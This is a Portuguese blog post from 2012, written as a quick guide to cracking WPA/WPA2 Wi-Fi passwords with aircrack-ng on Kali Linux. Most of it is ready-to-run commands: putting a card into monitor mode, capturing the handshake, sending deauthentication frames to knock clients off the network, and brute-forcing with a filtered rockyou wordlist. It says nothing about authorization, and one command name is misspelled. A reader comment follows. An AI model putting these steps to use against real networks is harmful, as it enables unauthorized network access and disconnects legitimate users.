Dead Packets

11/11/2012

Wireless Fun – Crackeando WPA/WPA2

Filed under: segurança,wireless — drak @ 3:36 PM

Mais um post da série Wireless Fun! Agora vamos ver como executar um simples ataque de brute-force em uma rede WPA ou WPA2 que usa autenticação por pre-shared key.

O objetivo desse post é ser um guia rápido, caso você não entenda o que está fazendo sugiro que leia as referências.

Esse post foi testado com o seguinte sistema:

Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali15 i686 GNU/Linux

Variáveis utilizadas

Interface = <INTERFACE>
Rede = <REDE_ALVO>
BSSID = <00:AA:BB:CC:DD:FF>
CLIENT_MAC = <11:22:33:44:55:66>
Arquivo de captura = <FILENAME_CAPTURA>

Inicie a interface em modo monitor

airomon-ng start <INTERFACE>

Inicie o airodump-ng para verificar o que tem por perto

airodump-ng mon0

Escolha a rede alvo e faça os filtros adequados pelo SSID e canal no airodump

airodump-ng --bssid <00:AA:BB:CC:DD:FF> --channel 1 --write <FILENAME_CAPTURA> mon0

Espere até ver uma mensagem parecida com “WPA handshake: 00:AA:BB:CC:DD:FF” na primeira linha do airodump-ng, caso ela não apareça e existirem clientes conectados você pode forçar um cliente a se reautenticar (lembre-se que isso fará com que ele seja desconectado, geralmente ele tentará se conectar novamente sozinho e nesse momento você conseguirá capturar o 4-way handshake):

aireplay-ng --deauth 1 -a <00:AA:BB:CC:DD:FF> -c <11:22:33:44:55:66> mon0

Depois disso você deve ver a mensagem “WPA handshake: 00:AA:BB:CC:DD:FF”.

Depois de ter capturado o 4-way handshake podemos começar o brute-force offline da PSK, para isso você precisa de uma wordlist, vamos usar uma wordlist padrão que já existe no kali, porém filtrando somente as senhas que nos interessam:

cd /usr/share/wordlists/
gunzip rockyou.txt.gz
grep -E '^.{8,63}$' < rockyou.txt >> rockyou_wpa_passwd.txt
aircrack-ng -w rockyou_wpa_passwd.txt -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Espere e comemore 🙂 (ou não…)

O ponto mais crítico nesse método é possuir uma boa wordlist, existem várias disponíveis publicamente. É importante lembrar também que a PSK deve ter entre 8 e 63 caracteres, para filtrar sua wordlist por esse critério, seguem dois comandos possíveis (um já utilizado acima):

awk '{ if ((length($0) > 7) && (length($0) < 64)){ print $0 }}' inputfile
grep -E '^.{8,63}$' < inputfile >> outputfile

Referências
Tutorial: How to Crack WPA/WPA2
Tutorial: WPA Packet Capture Explained
aircrack-ng: How to crack WEP with no clients
aircrack-ng, seção “other tips”

Anúncios

1 Comentário »

  1. Galera, estou com um problema aqui.
    Já conseguir até capturar a senha do roteador aqui em casa 1 vez, porém sempre que o aircrack tá rodando a wordlist o notebook está sendo desligado, tanto na minha bssid qnto nas outras visíveis. Já testei em outras tarefas e o mesmo não desliga, só acontece isso no momento que está rodando o aircrack. O que pode estar acontecendo?

    Comentário por Tarcisio Santos — 29/03/2015 @ 7:29 PM | Responder


RSS feed for comments on this post. TrackBack URI

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

Crie um website ou blog gratuito no WordPress.com.

%d blogueiros gostam disto: